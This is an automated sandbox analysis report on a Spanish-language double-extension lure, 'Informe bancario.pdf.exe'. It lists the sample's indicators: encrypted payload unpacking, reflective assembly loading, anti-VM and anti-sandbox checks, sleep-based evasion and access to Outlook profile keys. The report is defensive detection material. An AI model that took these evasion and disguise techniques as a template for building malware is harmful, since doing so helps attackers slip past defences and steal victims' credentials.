              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
              Source: Informe bancario.pdf.exe, Main.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: 0.0.Informe bancario.pdf.exe.4b0000.0.unpack, Main.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: 0.2.Informe bancario.pdf.exe.4b0000.0.unpack, Main.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: 4.0.Informe bancario.pdf.exe.2b0000.3.unpack, Main.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: 4.2.Informe bancario.pdf.exe.2b0000.0.unpack, Main.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: 4.0.Informe bancario.pdf.exe.2b0000.2.unpack, Main.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
              Source: Informe bancario.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: Informe bancario.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              Source: Yara matchFile source: 0.2.Informe bancario.pdf.exe.39c40c0.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Informe bancario.pdf.exe.39f9f00.10.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.Informe bancario.pdf.exe.400000.12.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Informe bancario.pdf.exe.29dc220.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.Informe bancario.pdf.exe.400000.12.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.Informe bancario.pdf.exe.400000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.Informe bancario.pdf.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Informe bancario.pdf.exe.39dfee0.9.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.Informe bancario.pdf.exe.400000.14.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Informe bancario.pdf.exe.39f9f00.10.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.Informe bancario.pdf.exe.400000.10.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.Informe bancario.pdf.exe.400000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.Informe bancario.pdf.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.Informe bancario.pdf.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Informe bancario.pdf.exe.29d4fd4.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.Informe bancario.pdf.exe.400000.14.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.Informe bancario.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.Informe bancario.pdf.exe.400000.10.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Informe bancario.pdf.exe.39dfee0.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Informe bancario.pdf.exe.2860464.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.293340629.00000000039C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000000.289020067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.523674646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000000.288685837.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000000.288344721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.292486343.0000000002858000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.293368296.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Informe bancario.pdf.exe PID: 6496, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Informe bancario.pdf.exe PID: 6824, type: MEMORYSTR
              Source: Informe bancario.pdf.exe, Main.cs.Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 0.0.Informe bancario.pdf.exe.4b0000.0.unpack, Main.cs.Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 0.2.Informe bancario.pdf.exe.4b0000.0.unpack, Main.cs.Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 4.0.Informe bancario.pdf.exe.2b0000.3.unpack, Main.cs.Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 4.2.Informe bancario.pdf.exe.2b0000.0.unpack, Main.cs.Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 4.0.Informe bancario.pdf.exe.2b0000.2.unpack, Main.cs.Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 4.0.Informe bancario.pdf.exe.2b0000.0.unpack, Main.cs.Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 4.0.Informe bancario.pdf.exe.2b0000.1.unpack, Main.cs.Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.0.Informe bancario.pdf.exe.6e0000.7.unpack, Main.cs.Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.0.Informe bancario.pdf.exe.6e0000.13.unpack, Main.cs.Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.0.Informe bancario.pdf.exe.6e0000.9.unpack, Main.cs.Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.0.Informe bancario.pdf.exe.6e0000.15.unpack, Main.cs.Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.0.Informe bancario.pdf.exe.6e0000.2.unpack, Main.cs.Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.0.Informe bancario.pdf.exe.6e0000.1.unpack, Main.cs.Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.2.Informe bancario.pdf.exe.6e0000.1.unpack, Main.cs.Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.0.Informe bancario.pdf.exe.6e0000.11.unpack, Main.cs.Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.0.Informe bancario.pdf.exe.6e0000.5.unpack, Main.cs.Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.0.Informe bancario.pdf.exe.6e0000.3.unpack, Main.cs.Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 5.0.Informe bancario.pdf.exe.6e0000.0.unpack, Main.cs.Net Code: THAI04 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 0_2_00E3C4F4 push esp; iretd
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 0_2_00E36940 push 9F9C0266h; iretd
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 0_2_00E36910 push 9DDC0266h; iretd
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 0_2_00E3EC28 push esp; retf
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 0_2_05239FDC push 1000005Eh; iretd
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 5_2_00402AC0 push eax; ret
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 5_2_00402AC0 push eax; ret
              Source: initial sampleStatic PE information: section name: .text entropy: 7.621462978207712

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: Possible double extension: pdf.exeStatic PE information: Informe bancario.pdf.exe
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information set: NOGPFAULTERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: 0.2.Informe bancario.pdf.exe.2860464.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.292486343.0000000002858000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Informe bancario.pdf.exe PID: 6496, type: MEMORYSTR
              Source: Informe bancario.pdf.exe, 00000000.00000002.292486343.0000000002858000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
              Source: Informe bancario.pdf.exe, 00000000.00000002.292486343.0000000002858000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exe TID: 6524Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exe TID: 6828Thread sleep time: -300000s >= -30000s
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess information queried: ProcessInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeThread delayed: delay time: 60000
              Source: Informe bancario.pdf.exe, 00000000.00000002.292486343.0000000002858000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: Informe bancario.pdf.exe, 00000000.00000002.292486343.0000000002858000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
              Source: Informe bancario.pdf.exe, 00000000.00000002.292486343.0000000002858000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
              Source: Informe bancario.pdf.exe, 00000000.00000002.292486343.0000000002858000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 5_2_00402B7C GetProcessHeap,RtlAllocateHeap,
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 5_2_0040317B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeMemory allocated: page read and write | page guard
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess created: C:\Users\user\Desktop\Informe bancario.pdf.exe C:\Users\user\Desktop\Informe bancario.pdf.exe
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeProcess created: C:\Users\user\Desktop\Informe bancario.pdf.exe C:\Users\user\Desktop\Informe bancario.pdf.exe
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Users\user\Desktop\Informe bancario.pdf.exe VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
